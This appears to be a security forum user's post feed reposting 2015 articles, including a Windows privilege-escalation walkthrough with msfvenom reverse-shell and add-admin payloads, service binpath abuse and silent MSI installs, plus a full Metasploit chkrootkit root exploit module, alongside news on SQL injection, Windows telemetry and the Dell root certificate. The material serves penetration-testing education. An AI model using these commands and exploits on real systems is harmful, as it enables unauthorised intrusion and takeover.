    [h=1]Senior IT Auditor[/h] What are we looking for? Senior IT Auditor for our Advisory team. Candidate profile: • Conduct IT Audits in accordance with IT audit methodology and other relevant standards; • Strong ability to articulate business risks of deficiencies identified to client personnel; • Identify and communicate findings to client personnel; • Recognize performance improvement opportunities for clients. Requirements: • Bachelor’s degree in an IT related field • Minimum 2 years of experience in IT audits • Ability to identify risks and controls in various IT systems (applications, computer networks, operating systems, databases) • Ability to test the IT controls (entity level, IT general controls, application level) and to identify compensating controls • Basic knowledge of various IT environments • Very good technical and business English • Ability to identify and resolve IT related business issues and provide innovative solutions both for IT and business • Work effectively either individually or as a member of a multi-skilled team • Professional discipline, accuracy, reliability and excellent analytical skills • Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation • Certifications such as CISA, CISSP, CRISC or ISO27001 will be considered a plus Our Offer: • A competitive salary and benefits package • The chance to develop a rewarding professional path and work on challenging assignments • Support for professional qualifications and personal development through a strong mentoring program • Work in a friendly team of security professionals who enjoy sharing their experience with colleagues • The opportunity to participate in a wide variety of technical projects and client environments • Flexible working program We are looking forward to receiving your CV and letter of motivation, in English, until December, 15th 2015. Shortlisted candidates will be invited to interview. Link: http://www.bestjobs.ro/locuri-de-munca-senior-it-auditor/228141/2 Note: 1. Job-ul nu este legat de security 2. Este adresat persoanelor care au mai facut asa ceva Info (cred): https://en.wikipedia.org/wiki/Information_technology_audit Daca aveti nevoie de mai multe informatii imi puteti da PM. Daca vreti sa fie vazut rapid si de catre cine trebuie CV-ul imi puteti da PM.
  14. Nytro
    [h=1]Black Hat USA 2015 - Red Vs Blue Modern Active Directory Attacks, Detection, And Protection[/h]
  15. Nytro
    O sponsoizare de la Starbucks, Gloria Jeans sau mai stiu eu ce, ar prinde bine. L-ar aduce pana si pe @aelius acolo, chiar de ar fi in Germania.
  16. Nytro
    OpenVPN for paranoids Tue 17 November 2015 By Victor Dorneanu Continuing my admin series this time I'd like to setup a VPN using OpenVPN as user-based VPN solution. Unlike IPSec solutions which require IPSec on both (server and client) sides, securing the VPN tunnel by OpenSSL is a more preferable option.In this post I'll try to show which steps have to be taken in order to: secure the communication channel use up-to-date (and secure!) TLS configurations prevent information leaks when the VPN tunnel is down At least for the last one some additional steps are required to route your traffic only through the VPN tunnel. As a client you don't want your connection to be "downgraded" (in terms of security) without even realizing it. That's why you might want to restrict your routes and allow outbound connection only through the (virtual) interface dedicated to the VPN. How this is done and which methods exist, is covered later on. Articol complet: OpenVPN for paranoids - blog.dornea.nu
  17. Nytro
    Posted on November 24, 2015 by Jonathan Common Windows Privilege Escalation Vectors Imagine this scenario: You’ve gotten a Meterpreter session on a machine (HIGH FIVE!), and you opt for running getsystem in an attempt to escalate your privileges… but what that proves unsuccessful? Should you throw in the towel? Only if you’re a quitter… but you’re not, are you? You’re a champion!!! In this post I will walk us through common privilege escalation techniques on Windows, demonstrating how to “manually” accomplish each task as well as talk about any related Metasploit modules. While most techniques are easier to exploit when escalating from Local Administrator to SYSTEM, improperly configured machines can certainly allow escalation from unprivileged accounts in the right circumstances. Note: In this post, we will focus on escalation techniques that do not rely on kernel exploits such as KiTrap0d (which just so happens to be one of four methods attempted by Meterpreter’s getsystem.) Trusted Service Paths This vulnerability deals with how Windows interprets spaces in a file path for a service binary. Given that these services often run as SYSTEM, there is an opportunity to escalate our privileges if we can exploit this behavior. For example, consider the following file path: C:\Program Files\Some Folder\Service.exe For each space in the above file path, Windows will attempt to look for and execute programs with a name that matches the word in front of space. The operating system will try all possibilities throughout the entire length of the file path until it finds a match. Using the example above, Windows would try to locate and execute programs in the following order: C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Service.exeNote: This behavior happens when a developer fails to enclose the file path in quotes. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability. As a result, you may see this vulnerability referred to as “Unquoted Service Paths.” If we were to drop a properly-named malicious executable in an affected folder, upon a restart of the service, we could have our malicious program run as SYSTEM (in a majority of cases). However, prior to dropping an executable, we would have to ensure that we had the necessary privileges to the target folder (organizations with least privilege properly implemented would prevent us from dropping an executable at the root of the drive). Let’s go ahead and step through the process of identifying and exploiting this vulnerability… To start, we can utilize the following one-line Windows Management Instrumentation (WMI) query, written by Danial Compton (@commonexploits), to list all unquoted service paths (minus built-in Windows services) on our compromised machine, GREED: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ As you can see, we have a hit! The path for PFNet’s service binary is unquoted and contains spaces. If the stars align, we will also have the necessary folder permissions. Assuming we’ve already checked our permissions on the root of the drive, let’s use the built-in Windows tool, Integrity Control Access Control Lists (icacls), to view the permissions of the other affected folder in the path, Privacyware icacls "C:\Program Files (x86)\Privacyware" Notice the first line: BUILTIN\Users:(OI)(CI)(M), which lists the permissions for unprivileged users. The (M) stands for Modify, which grants us, as an unprivileged user, the ability to read, write and delete files and subfolders within this directory. WHAT LUCK! We are now free to create and drop a malicious executable called Privatefirewall.exe… let’s begin! Note: We would be able to accomplish the same task if we had Write (W) permissions to the Privacyware folder. For a more information on Windows permissions, check out the following MSDN link: File and Folder Permissions. When creating an executable with MSFVenom, you may wish to have your payload simply add a user to the Local Administrators group (windows/adduser) or send you a reverse Meterpreter shell running as SYSTEM (as demonstrated below). Other options are certainly possible! msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe Now that our malicious executable is in place, let’s try to stop and then restart the PFNet service in order to kick off our shell. To do this, we can utilize the built-in Service Control (sc) tool: sc stop PFNet sc start PFNet LAME! As you can see above, while we have Modify permissions for certain folders within the service path, we don’t actually have permissions to interact with the PFNet service itself. In this scenario, we can wait for someone to restart the GREED machine or force a restart ourselves (stealthy the latter is not). Upon a restart of GREED, Windows locates and executes our Privatefirewall binary, sending us a shell with SYSTEM privileges. The world (or, at least, GREED) is all ours at this point! Metasploit Module: exploit/windows/local/trusted_service_path This module only requires that you link it to an existing Meterpreter session before running: A review of the source code reveals that the module uses some regular expression magic to filter out any paths that are quoted or have no spaces in the path to create a list of vulnerable services. The module then attempts to exploit the first vulnerable service on the list by dropping a malicious service executable into the affected folder. The vulnerable service is then restarted, and afterwards, the module takes care of removing the malicious executable. Note: I didn’t see anywhere in the module’s code that a check is performed as to whether we have appropriate access to the target directory prior to attempting to drop the executable. This seems a little odd to me… Vulnerable Services When discussing exploitation of Vulnerable Services, there are two main ideas that one can be referring to exploiting: Service Binaries Windows Services The former is very similar to what we did with Trusted Service Paths. Whereas Trusted Service Paths exploits odd Windows file path interpretation in combination with folder permissions along the service path, Vulnerable Service Executables takes advantage of file/folder permissions pertaining to the actual executable itself. If the correct permissions are in place, we can simply replace the service executable with a malicious one of our own. Using Privacy Firewall as an example, we’d place an executable named pfsvc.exe into the “Privatefirewall 7.0” folder. VIOLA! The latter refers to the actual Windows Service and the ability to modify it’s properties. These Services run in the background and are controlled by the Operating System through the Service Control Manager (SCM), which issues commands to and receives updates from all Windows Services. If we can modify a Service’s binary path (binpath) property, upon a restart of the service, we can have the Service issue a command as SYSTEM on our behalf. Let’s take a look… The easiest way to determine which Windows Services have vulnerable privileges is to utilize the AccessChk tool, which is part of the SysInternals Suite. This group of tools was written for Microsoft by Mark Russinovich to allow for advanced querying, managing and troubleshooting of systems and applications. While it’s always a good idea to limit the amount of items that you allow to touch disk during a pentesting engagement, due to risk of anti-virus detection (among other concerns), since AccessChk is an official and well-known Microsoft tool, the chances of flagging any protective mechanisms on the machine are slim. Once we have AccessChk downloaded on our target machine, GREED, we can run the following command to determine which Services can be modified by any authenticated user (regardless of privilege level): accesschk.exe -uwcqv "Authenticated Users" * /accepteula Well, what do we have here? PFNet shows it’s face once more! SERVICE_ALL_ACCESSmeans we have full control over modifying the properties of the PFNet Service. In most scenarios an unprivileged account should not have this type of control over a Windows Service, and often times these types of vulnerabilities occur due to misconfiguration by an Administrator or even the third-party developer (believe it or not, Windows XP SP0 actually had several built-in Services with this vulnerability *facepalm*). Note: The PFNet Service was intentionally modified to be insecure for the purposes of this particular demonstration. This explains why we were unable to successfully control the service during the Trusted Service Paths walk-through. Let’s utilize the Service Control (sc) utility to view the configuration properties of the PFNet Service: sc qc PFNet Notice that the BINARY_PATH_NAME value is set to point to pfsvc.exe, which we know is is the associated service binary. Changing this value to a command to add a user and restarting the service will execute this command as SYSTEM (confirmed by validatingSERVICE_START_NAME is set to LocalSystem). We can repeat the process one more time to add our new user to the Local Administrator group: sc config PFNET binpath= "net user rottenadmin P@ssword123! /add" sc stop PFNET sc start PFNET sc config PFNET binpath= "net localgroup Administrators rottenadmin /add" sc stop PFNET sc start PFNET YIKES! The sc utility throws an error each time we start the service with one of our malicious commands in the binpath. This is because the net user and net localgroup commands do not point to the service binary and therefore the SCM cannot communicate with the service. Never fear, however, as the error is thrown only afterissuing our malicious commands: Note: I’d recommend setting the binpath property to point to the original service binary and having the service successfully started/running once you’ve completed your privilege escalation. This will allow normal Service behavior to resume and reduce drawing unwanted attention. Now that we have an established account on GREED with Administrator privileges, it would be rather simple to escalate to SYSTEM in the future if needed (bit o’ Mimikatz, anyone?). Metasploit Module: exploit/windows/local/service_permissions This module only requires that you link it to an existing Meterpreter session before running: This module tries two methods in an attempt to escalate to SYSTEM. First, if the Meterpreter session is currently running under Administrator privileges, the module will aim to create and run a new service. If the current account privileges do not allow for service creation, the module will then seek out to determine if weak folder or file permissions will allow for hijacking existing services. When creating new services or hijacking existing ones, the module creates an executable, which has a randomly-generated filename as well as installation folder path. Enabling the AGGRESSIVE option on this module will exploit every vulnerable service on the target host. With the option disabled, the module stops at the first successful escalation attempt. AlwaysInstallElevated AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. However, granting users this ability is a security concern because For this to occur, there are two registry entries that have to be set to the value of “1” on the machine: [HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001The easiest way to check the values of these two registry entries is to utilize the built-in command line tool, reg query: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated Note: If you happen to get an error message similar to: The system was unable to find the specified registry key or value, it may be that a Group Policy setting for AlwaysInstallElevated was never defined, and therefore an associated registry entry doesn’t exist. Now that we know AlwaysInstallElevated is enabled for both the local machine and the current user, we can proceed to utilize MSFVenom to generate an MSI file that, when executed on the victim machine, will add a user to the Local Administrators group: msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msiOnce you have our newly created MSI file loaded on the victim, we can leverage a command-line tool within Windows, Msiexec, to covertly (in the background) run the installation: msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msiThe properties of the switches utilized in the above Msiexec command are below: /quiet = Suppress any messages to the user during installation /qn = No GUI /i = Regular (vs. administrative) installation Once run, we can check to validate that our account was created and added to the Local Administrator Group: Note: MSI files created with MSFVenom as well as with the always_install_elevated module discussed below, will fail during installation. This behavior is intentional and meant to prevent the installation being registered with the operating system. Metasploit Module: exploit/windows/local/always_install_elevated As you can see below, this module simply requires that you link it to an existing session prior to running: There is an advanced setting, called QUIET, that you’ll want to enable in most scenarios. Turning on QUIET acts the same as utilizing the /quiet switch as part of a Msiexec command. This ensures that all messages to the user are suppressed, keeping our activities covert. The module creates an MSI file with a randomly-generated filename and takes care of all cleanup after deployment. Unattended Installs Unattended Installs allow for the deployment of Windows with little-to-no active involvement from an administrator. This solution is ideal in larger organizations where it would be too labor and time-intensive to perform wide-scale deployments manually. If administrators fail to clean up after this process, an EXtensible Markup Language (XML) file called Unattend is left on the local system. This file contains all the configuration settings that were set during the installation process, some of which can include the configuration of local accounts, to include Administrator accounts! While it’s a good idea to search the entire drive, Unattend files are likely to be found within the following folders: C:\Windows\Panther\ C:\Windows\Panther\Unattend\ C:\Windows\System32\ C:\Windows\System32\sysprep\ Note: In addition to Unattend.xml files, be on the lookout for sysprep.xml and sysprep.inf files on the file system. These files can also contain credential information utilizing during deployment of the operating system, allowing us to escalate privileges. Once you’ve located an Unattend file, open it up and search for the <UserAccounts> tag. This section will define the settings for any local accounts (and sometimes even Domain accounts): <UserAccounts> <LocalAccounts> <LocalAccount> <Password> <Value>UEBzc3dvcmQxMjMhUGFzc3dvcmQ=</Value> <PlainText>false</PlainText> </Password> <Description>Local Administrator</Description> <DisplayName>Administrator</DisplayName> <Group>Administrators</Group> <Name>Administrator</Name> </LocalAccount> </LocalAccounts> </UserAccounts> In the snippet of the sample Unattend file above, you can see a local account being created and added to the Administrators group. The administrator chose not to have the password stored in plaintext; however, it is merely obfuscated with Base64. As seen below, we can trivially decode it in Kali with the following: echo "UEBzc3dvcmQxMjMhUGFzc3dvcmQ=" | base64 -d So, our password is “P@ssword123!Password”? Not quite… Microsoft appends “Password” to all passwords within Unattend files before encoding them; therefore, our Local Administrator password is in fact just “P@ssword123!”. Note: Under the <UserAccounts> section, you may also see<AdministratorPassword> tags, which are another way to configure the Local Administrator account. Metasploit Module: post/windows/gather/enum_unattend This module is relatively straightforward. The only action is to assign it to the active Meterpreter session we are interested in: After a review of the source code, it appears that this module will only search for Unattend.xml files, and therefore, may miss stored credentials in related files such as syspref.xml and syspref.inf. On the positive side, this module will search the entire drive in an attempt to located Unattend files. Group Policy Preferences (GPP) Please refer to my August 2015 blog post for a detailed walkthrough of exploiting GPP for privilege escalation: What You Know Bout GPP???. !!! Important Note Regarding Anti-Virus !!! During my testing, MSI and EXE binaries generated by MSFVenom as well as Metasploit Modules were flagged by some Anti-Virus (a/v) software. This is because the executable templates utilized by Metasploit are well-known to a/v vendors. For more information on why templates are flagged and how to evade detection, please see my September 2015 blog post: A/V Ain’t Got Nothing On Me! Utilizing an obfuscation tool such as Veil-Evasion or creating your own executable by “compiling” PowerShell scripts (to add a user to the Administrators group, for example) stand a much better chance of bypassing any deployed a/v solution. Within Metasploit, modules offer an advanced option to substitute custom EXE and MSI binaries. Just be sure to set EXE::Custom or MSI::Custom to point to your binary prior to executing the module. Additional Resources Windows Privilege Escalation Fundamentals This is an amazing resource put together by Ruben Boonen (@FuzzySec) and was indispensable during my preparation for the Offensive Security Certified Professional exam. Ruben touches on escalation techniques not covered in my post, such as searching the registry for credentials as well as exploiting scheduled tasks. Most definitely worth the read… PowerUp PowerUp is a PowerShell tool written by Will Schroeder (@harmj0y) that will query a victim machine in order to identify what privilege escalation vectors are present. With most of the vectors, if the machine is vulnerable, you can then utilize PowerUp for exploitation. Originally written in 2014 as a standalone tool, it has now been integrated into Empire, a post-exploitation, cryptographically-secure PowerShell agent. Sursa: http://toshellandback.com/2015/11/24/ms-priv-esc/
  18. Nytro
    Anti-Disassembly techniques used by malware (a primer) Rahul Nair | 22 Nov 2015 There are chances that malware authors implement some kind of trolling so that a malware analyst has a hard time figuring out code during static analysis (IDA Pro ?). Implementing these cunning asm instruction will not cause any issues to the flow of the program but will confuse static analysis tools such as IDA Pro from interpreting the code correctly. Once upon a time there were 2 kinds of disassembly algorithms -Linear disassembly and flow-oriented disassembly.The former was used in tutorials/ nobody gives a damn is not used that much in disassemblers. What we are concerned about is the latter which is used in IDA Pro and sometime gamed by malware authors- 1.Jump Instructions to a location with constant value This is the most used trick by malware writers/anti-disassembly programs which create jumps into the same location + 1 or 2 bytes. It would lead to interpretation of completely different byte code by the system. For instance the actual jump instance here would take the flow of program to the bytecode mentioned above. Since tools like IDA pro are not that clever(no offense to the creator) it cannot make such judgements and instead interprets the opcode from E8 instead which shows us a bunch of call instructions to some random crappy address, weird decrements and adds. No we can fix this with ease in IDA PRO. Do that by pressing D on the E8 and C key on the 8B Opcode and voila! you get what is actually being interpreted. After playing around more with the C & D key you get the following in IDA which seems legit Now what has happened here is that the the author might have inserted something known as a rogue byte which confuses IDA pro leading to a wrong interpretation of the rest of the opcode.This is a simple technique and if you dont like to see that ugly E8 byte you could NOP it out 2.Jump Instructions to the Same target IDA Pro usually follows this behavior where for a conditional instruction (jnz) it first disassembles the false branch of the conditional instruction and then moves forward to the true part. From a malware POV since both the jz and jnz are present it is similar to an unconditional jump Once IDA pro reaches the jz instruction it would first branch out and interpret the false instruction and move on to jnz where it would do the same.A nice and dirty trick is to insert a rogue byte code and make the disassembler interpret the instructions as a call. If we do the C & D thingy in IDA pro as mentioned in 1. we get the following code 3.Ping-Pong jumps I have no idea what this technique is named as but it involves doing a lot of jumping around using the method mentioned in 1.and maybe even a bit of 2 Let's look at this innocent jump below. This jumps goes back to loc_4012E6+2 which would be the EB opcode. If we ignore the 66 and B8 opcode ,make IDA interpret the rest as code instead we get the following Yay more jumps. Once again ignoring the other E8 byte and considering the rest as code the result is as follows- We can see how incorporating rogue bytes obscures the real function call from being hidden in static analysis. 4.Usage of Function Pointers Instead of a screen shot here is a piece of code mov [ebp+var8],offset sub4211C1 push 4Ah call [ebp+var_8] What happens above is that a function is called via use of a reference to an address. For example for the function call it would get the funciton stringname by the use of some weird bunch of decoding subroutine and save the value in an offset sub4211C1. This would make static analysis really hard since IDA won't recognize it easily. From a static analysis point of view though it dosen't seem to cause massive harm this coupled with other anti-disassembly techniques can lead to annoyance for an analyst. There are a couple more annoying techniques which I will explore in another post such as abusing the return pointer (for fun and profit:P ) ,using your own Structed Exception Handler (SEH) and screwing around with the stack-frame construction in IDA pro. Sursa: Anti-Disassembly techniques used by malware (a primer)
  19. Nytro
    Microsoft Makes Windows 10 Automatic Spying Worse Microsoft MSFT +0.11% has been on a roll lately. Its massive Windows 10 update ‘Threshold 2’ has far more good features than bad ones, the ‘free upgrade’ rules have been improved and even Microsoft’s Black Friday 2015 dealsare surprisingly great. But a new discovery has been made which isn’t good news – at all… Earlier this month Microsoft finally went on record admitting that automatic spying within Windows 10 cannot be stopped. This sparked a lot of outrage and with ‘Threshold 2’ it appeared Microsoft had done a sharp U-turn because the background service at the heart tracking (the ‘Diagnostics Tracking Service’ aka ‘DiagTrack’) appeared to have been removed. Critics celebrated and it was another well deserved pat on the back for Microsoft. Except it turns out Microsoft had just been very sneaky. What Tweakhound discovered and was subsequentlyconfirmed by BetaNews, is Microsoft simply renamed DiagTrack. It is now called the ‘Connected User Experiences and Telemetry Service’ – which is both a) deliberately vague, and misleading (don’t ‘Connected User Experiences’ sound great). Windows 10 prior to the Threshold 2 update shows ‘Diagnostics Tracking Service’. Image credit: Tweakhound Even sneakier is, in being renamed, Microsoft also reset users preferences. Those who dug deep into the Windows 10 registry to disable DiagTrack will find it has been re-enabled now it is called the Connected User Experiences and Telemetry Service. Yes, tracking is back and without any warning and your preferences were irrelevant. The good news is you can disable the Connected User Experiences and Telemetry Service the same way as DiagTrack: Hold down the Windows key and tap the R key In the box that opens type ‘services.msc’ and press the Enter key In the ‘Services (Local)’ section locate ‘Connected User Experiences and Telemetry’ and double-click it In the ‘Service status’ section click ‘Stop’ Under the ‘Startup type’ drop down menu select ‘Disabled’ and then confirm this and close the window by clicking ‘OK’ Note: it is advisable to disable Not delete the service. Deleting it can cause problems Windows 10 prior to the Threshold 2 update shows ‘Connected User Experiences And Telemetry’ which executes the exact same service as DiagTrack. Image credit: Tweakhound So what is Microsoft thinking here? I’ve reached out to the company but, despite recognising my enquiry, it has yet to issue a statement. I’ll update this post when it does. While Microsoft thinks about what to say, I’d say the problem with the DiagTrack rebrand is the company wasn’t thinking. Subtle under the hood changes will always be picked up for such a high profile product. That said such a move is consistent with the negatives in Threshold 2 namely: it resets many user preferences (including basics like your preferred web browser) if they weren’t Microsoft product/services as well as silently deleting third party system monitoring apps like: CPU-Z, speccy, 8gadgetpack, SpyBot, HWMonitor and more. In my opinion it is this kind of overriding desire for control and a disregard for user choices which is harming Windows 10. At its core Windows 10 is a modern and highly capable platform, but it has been buried under ludicrous layers of control. Worst still it has created a two tier customer base where consumers are forced to take updates which businesses can delay, effectively turning everyday users into bug testers for corporations. It all feels unsavoury and unnecessary and (while it could be coincidence) there has been a -users-reluctant-to-switch/'>dramatic slowdown in Windows 10 growth after an explosive beginning. For the first ever Free version of Windows, that’s not great. How can Microsoft reignite the love for Windows 10? I’d say a good start would be to stop doing daft things like this… Sursa: http://www.forbes.com/sites/gordonkelly/2015/11/24/windows-10-automatic-spying-begins-again/
  20. Nytro
    HTTPS e ok (depinde si de tine). HTTP nu e ok. Tor Browser e ok (depinde si de tine). Mozilla cu proxy Tor nu e ok. https://hackertarget.com/tor-exit-node-visualization/
  21. Nytro
    [h=1]Chkrootkit Local Privilege Escalation[/h] ### This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit4 < Msf::Exploit::Local # This could also be Excellent, but since it requires # up to one day to pop a shell, let's set it to Manual instead. Rank = ManualRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Chkrootkit Local Privilege Escalation', 'Description' => %q{ Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privsec. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default. }, 'Author' => [ 'Thomas Stangner', # Original exploit 'Julien "jvoisin" Voisin' # Metasploit module ], 'References' => [ ['CVE', '2014-0476'], ['OSVDB', '107710'], ['EDB', '33899'], ['BID', '67813'], ['CWE', '20'], ['URL', 'http://seclists.org/oss-sec/2014/q2/430'] ], 'DisclosureDate' => 'Jun 04 2014', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'SessionTypes' => ['shell', 'meterpreter'], 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Passive, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h )) register_options([ OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit']) ]) end def check version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1") if version =~ /chkrootkit version 0\.[1-4]/ Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit print_warning('Rooting depends on the crontab (this could take a while)') write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n") cmd_exec('chmod +x /tmp/update') register_file_for_cleanup('/tmp/update') print_status('Payload written to /tmp/update') print_status('Waiting for chkrootkit to run via cron...') end end Sursa: https://www.exploit-db.com/exploits/38775/
  22. Nytro
    WRITTEN BY JOSEPH COX November 20, 2015 // 08:00 AM EST One of the hackers suspected of being behind the TalkTalk breach, which led to the personal details of at least 150,000 people being stolen, used a vulnerabilitydiscovered two years before he was even born. That method of attack was SQL injection (SQLi), where hackers typically enter malicious commands into forms on a website to make it churn out juicy bits of data. It's been used to steal the personal details of World Health Organization employees,grab data from the Wall Street Journal, and hit the sites of US federal agencies. “It’s the most easy way to hack,” the pseudonymous hacker w0rm, who was responsible for the Wall Street Journal hack, told Motherboard. The attack took only a “few hours.” But, for all its simplicity, as well as its effectiveness at siphoning the digital innards of corporations and governments alike, SQLi is relatively easy to defend against. So why, in 2015, is SQLi still leading to some of the biggest breaches around? SQLi was possibly first documented by Jeff Forristal in the hacker zine Phrack. Back then, Forristal went by the handle rain.forest.puppy, but he's now CTO of mobile security at cybersecurity vendor Bluebox security. “According to Microsoft, what you're about to read is not a problem, so don't worry about doing anything to stop it.” SQL, or Structured Query Language, is a programming language used to manage databases. In essence, it's used when a website needs to call up a piece of information from its database, either to process it or present it to a user. But Forristal had found that typing certain commands would force a server to reveal information stored on it. “People can possibly piggyback SQL commands,” he wrote. In the December 1998 issue of Phrack, Forristal wrote about a series of issues with a version of Microsoft SQL server. When Forristal's fellow researcher told Microsoft of the problems, “their answer was, well, hilarious,” he wrote. “According to them, what you're about to read is not a problem, so don't worry about doing anything to stop it.” Today, over 15 years after it was first publicly disclosed, SQLi repeatedly sits at thenumber one spot of vulnerabilities in the OWASP Top 10 report, which is released every three years by the Open Web Application Security Project (OWASP) Foundation,a non-profit that monitors the threats that websites face. Phrack's current logo. Image: Phrack “SQL injection is always the number one risk. That is a reflection of just how many incidents are out there, as well as other factors that keep it very high up there,” Troy Hunt, founder of breach site haveibeenpwned.com, told Motherboard in a phone interview. “When you go to a webpage, and you make a request, that parses part of the data in the request back to a server,” Hunt said. “For example, you read a news article, and the news article, in the address bar it has, “id=1”, and that gives you news article number 1, and then you get another one with ID 2.” But, “with a SQLi attack, an attacker changes that ID in the address bar to something that forces the database to do something it's not meant to do,” Hunt said, such as returning a piece of private data. An individual attack might just return one piece or section of info, so an attacker is likely to “repeat it it over and over and over again, as many times as is necessary, so they get every piece of data from the database,” Hunt said. Naturally, that's going to be quite time consuming. So, a hacker might use tools that automate the process instead. Those include Havij, which “is popular amongst script kiddies as it's for Windows and has a [graphical user interface],” Mustafa Al-Bassam, asecurity researcher and former LulzSec hacker, told Motherboard in an online chat. Another commonly used piece of software is sqlmap. “It crawls the pages on the website, similar to how a search engine crawler might, looks for input forms on the website, and submits the forms with inputs that might cause a MySQL syntax error,” Al-Bassam added. When the attacker is looking for a target to hit in the first place, that's just as simple to automate too. Image: sqlmap “They would use Google to search for URLs that are known to be typically associated with scripts that are vulnerable to SQL injection,” Al-Bassam said. “They would typically have a script that goes through all the URLs and tests them automatically to see if they're vulnerable.” “You could teach a 4-year-old to do it,” Al-Bassam added, summing up how incredibly easy the whole process is. Indeed, Hunt has uploaded a video of him teaching his 3-year-old son how to carry out an SQLi attack with Havij. “You put the URL in, here's all the data out,” Hunt told Motherboard. There are also ample on how to carry out an SQLi attack.The thing is, there are solutions ready to be deployed by website developers to stop SQLi attacks and the unnecessary leaking of customers data or corporate details. And those solutions have been around for years. One of those is the adoption of "prepared statements": when SQL commands controlling the database can’t be directly dictated by a user’s input. If the solutions are fairly straight forward, why are SQLi-based attacks still happening? “The benefit of prepared statements is that they set the semantics of a query so that any incoming data can’t surprise the developer by including syntax that changes a query intended to retrieve a single row into a query that extracts data from arbitrary tables,” Mike Shema, senior manager, software development engineer from Yahoo!, told Motherboard in an email. Another is to “use SQL libraries that take care of input sanitization for them,” Al-Bassam suggested. This, in short, scrubs any data entered by the user to remove any potential malicious parts of it. So, if SQLi is so easy that literally a child could do it, and the solutions are fairly straight forward, why are SQLi-based attacks still happening? “Any serious programmer should know about SQLi, but there's a massive shortage of programmers, so companies hire anyone even if they don't have the right training or experience to mitigate basic vulnerabilities,” Al-Bassam suggested. On top of this, “they're often put under pressure by their managers to develop functional software rather than secure software.” Shema from Yahoo! echoed this, and said that “Sometimes small apps with a narrow feature set just need to be written quickly,” meaning that the developers might bypass some of the mitigations for each attacks, despite them being relatively straight forward to implement. Hunt was slightly less forgiving, and didn't agree that it was because of pressure from higher management. Instead, he lamented about the large number of tutorials available to web developers online that, instead of providing decent advice, detail how to make systems that are vulnerable to SQLi. "I've seen multiple tutorials come up this year that have got blatant SQL injection risks in them,” he said. So just as script kiddies continue to share their SQLi on YouTube, there is parallel information sharing going on with website developers. “We've got this ability for anyone to stand up, and share their knowledge, and not always get it right,” Hunt said.Ultimately, the responsibility of the security of these sites, and the data they contain, boils down to web developers themselves. That means SQLi and the breaches it causes will remain, at least for a little while longer. Sursa: http://motherboard.vice.com/read/the-history-of-sql-injection-the-hack-that-will-never-go-away
  23. Nytro
    Superfish 2.0: Dangerous Certificate on Dell Laptops breaks encrypted HTTPS Connections tl;dr Dell laptops come preinstalled with a root certificate and a corresponding private key. That completely compromises the security of encrypted HTTPS connections. I've provided an online check, affected users should delete the certificate. It seems that Dell hasn't learned anything from the Superfish-scandal earlier this year: Laptops from the company come with a preinstalled root certificate that will be accepted by browsers. The private key is also installed on the system and has been published now. Therefore attackers can use Man in the Middle attacks against Dell users to show them manipulated HTTPS webpages or read their encrypted data. The certificate, which is installed in the system's certificate store under the name "eDellRoot", gets installed by a software called Dell Foundation Services. This software is still available on Dell's webpage. According to the somewhat unclear description from Dell it is used to provide "foundational services facilitating customer serviceability, messaging and support functions". The private key of this certificate is marked as non-exportable in the Windows certificate store. However this provides no real protection, there are Tools to export such non-exportable certificate keys. A user of the plattform Reddit has posted the Key there. For users of the affected Laptops this is a severe security risk. Every attacker can use this root certificate to create valid certificates for arbitrary web pages. Even HTTP Public Key Pinning (HPKP) does not protect against such attacks, because browser vendors allow locally installed certificates to override the key pinning protection. This is a compromise in the implementation that allows the operation of so-called TLS interception proxies. I was made aware of this issue a while ago by Kristof Mattei. We asked Dell for a statement two weeks ago and didn't get any answer. It is currently unclear which purpose this certificate served. However it seems unliklely that it was placed there deliberately for surveillance purposes. In that case Dell wouldn't have installed the private key on the system. Affected are only users that use browsers or other applications that use the system's certificate store. Among the common Windows browsers this affects the Internet Explorer, Edge and Chrome. Not affected are Firefox-users, Mozilla's browser has its own certificate store. Users of Dell laptops can check if they are affected with an online check tool. Affected users should immediately remove the certificate in the Windows certificate manager. The certificate manager can be started by clicking "Start" and typing in "certmgr.msc". The "eDellRoot" certificate can be found under "Trusted Root Certificate Authorities". This incident is almost identical with the Superfish-incident. Earlier this year it became public that Lenovo had preinstalled a software called Superfish on its Laptops. Superfish intercepts HTTPS-connections to inject ads. It used a root certificate for that and the corresponding private key was part of the software. After that incident several other programs with the same vulnerability were identified, they all used a software module called Komodia. Similar vulnerabilities were found in other software products, for example in Privdog and in the ad blocker Adguard. This article is mostly a translation of a German article I wrote for Golem.de. Image source and license: Wistula / Wikimedia Commons, Creative Commons by 3.0 Sursa: https://blog.hboeck.de/archives/876-Superfish-2.0-Dangerous-Certificate-on-Dell-Laptops-breaks-encrypted-HTTPS-Connections.html
